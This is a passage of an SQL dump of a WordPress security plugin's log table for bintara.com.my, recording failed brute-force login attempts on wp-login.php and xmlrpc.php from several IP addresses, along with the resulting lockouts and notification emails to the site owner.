11:25:06',17883208,19289160,'https://bintara.com.my/wp/wp-login.php',1,0,'36.92.1.31'),(25574,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:25:07','2019-09-21 11:25:06',18088880,19289160,'https://bintara.com.my/wp/wp-login.php',1,0,'36.92.1.31'),(25575,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIjViJ7D9Gn7wDPh8YSQAAAMk\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"40190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIjViJ7D9Gn7wDPh8YSQAAAMk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065105.9711\";s:12:\"REQUEST_TIME\";s:10:\"1569065105\";}}','notice','2019-09-21 11:25:10','2019-09-21 11:25:09',18314320,19612256,'https://bintara.com.my/blog/xmlrpc.php',1,0,'132.148.146.230'),(25576,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIoXkXpgmG5P@iB8kVywAAAJM\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:10:\"36.92.1.31\";s:11:\"REMOTE_PORT\";s:5:\"59590\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIoXkXpgmG5P@iB8kVywAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065128.5256\";s:12:\"REQUEST_TIME\";s:10:\"1569065128\";}}','notice','2019-09-21 11:25:33','2019-09-21 11:25:32',18313528,19610800,'https://bintara.com.my/wp/xmlrpc.php',1,0,'36.92.1.31'),(25577,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIp1iJ7D9Gn7wDPh8YTwAAANA\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"52596\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIp1iJ7D9Gn7wDPh8YTwAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065132.5211\";s:12:\"REQUEST_TIME\";s:10:\"1569065132\";}}','notice','2019-09-21 11:25:37','2019-09-21 11:25:36',17801304,19292136,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(25578,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:25:36\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:25:36\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:40:36\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:40:36\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:25:37','2019-09-21 11:25:36',17885944,19292136,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(25579,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:25:37','2019-09-21 11:25:36',18091688,19292136,'https://bintara.com.my/test/wp-login.php',1,0,'149.56.38.19'),(25580,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIu1iJ7D9Gn7wDPh8YWAAAAMw\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"54976\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIu1iJ7D9Gn7wDPh8YWAAAAMw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569065147.574\";s:12:\"REQUEST_TIME\";s:10:\"1569065147\";}}','notice','2019-09-21 11:25:56','2019-09-21 11:25:55',18310312,19607896,'https://bintara.com.my/test/xmlrpc.php',1,0,'149.56.38.19'),(25581,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:25:55\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:25:55\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:40:55\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:40:55\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 11:25:56','2019-09-21 11:25:55',18390712,19607896,'https://bintara.com.my/test/xmlrpc.php',1,0,'149.56.38.19'),(25582,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:25:56','2019-09-21 11:25:55',18598088,19607896,'https://bintara.com.my/test/xmlrpc.php',1,0,'149.56.38.19'),(25583,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIvDDrcQxTmGrCWuaLhAAAAcg\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.153.203\";s:11:\"REMOTE_PORT\";s:5:\"33800\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIvDDrcQxTmGrCWuaLhAAAAcg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065155.3123\";s:12:\"REQUEST_TIME\";s:10:\"1569065155\";}}','notice','2019-09-21 11:25:58','2019-09-21 11:25:57',17801496,19291928,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.153.203'),(25584,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:25:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:25:57\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:40:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:40:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:25:58','2019-09-21 11:25:57',17886200,19291928,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.153.203'),(25585,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:25:58','2019-09-21 11:25:57',18092000,19291928,'https://bintara.com.my/blog/wp-login.php',1,0,'157.230.153.203'),(25586,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYI0XkXpgmG5P@iB8kV8wAAAIs\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.52.13\";s:11:\"REMOTE_PORT\";s:5:\"42030\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYI0XkXpgmG5P@iB8kV8wAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065176.7445\";s:12:\"REQUEST_TIME\";s:10:\"1569065176\";}}','notice','2019-09-21 11:26:18','2019-09-21 11:26:17',17795208,19285672,'https://bintara.com.my/wp/wp-login.php',1,0,'103.28.52.13'),(25587,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:26:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:26:17\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:41:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:41:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:26:18','2019-09-21 11:26:17',17880256,19285672,'https://bintara.com.my/wp/wp-login.php',1,0,'103.28.52.13'),(25588,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:26:18','2019-09-21 11:26:17',18085904,19285672,'https://bintara.com.my/wp/wp-login.php',1,0,'103.28.52.13'),(25589,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 